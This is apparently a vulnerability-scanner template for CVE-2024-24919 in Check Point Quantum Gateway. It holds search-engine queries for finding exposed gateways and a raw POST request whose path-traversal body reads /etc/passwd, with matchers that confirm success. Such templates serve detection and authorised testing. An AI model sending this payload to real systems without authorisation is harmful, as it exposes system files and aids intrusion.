id: CVE-2024-24919

info:
  name: Check Point Quantum Gateway - Information Disclosure
  author: johnk3r
  severity: high
  description: |
    CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.
  reference:
    - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
    - https://support.checkpoint.com/results/sk/sk182337
  metadata:
    verified: true
    max-request: 1
    vendor: checkpoint
    product: quantum_security_gateway
    shodan-query:
      - html:"Check Point SSL Network"
      - http.html:"check point ssl network"
    fofa-query: body="check point ssl network"
    cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
  tags: cve,cve2024,checkpoint,lfi

http:
  - raw:
      - |
        POST /clients/MyCRL HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip

        aCSHELL/../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*"
          - "nobody:.*"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950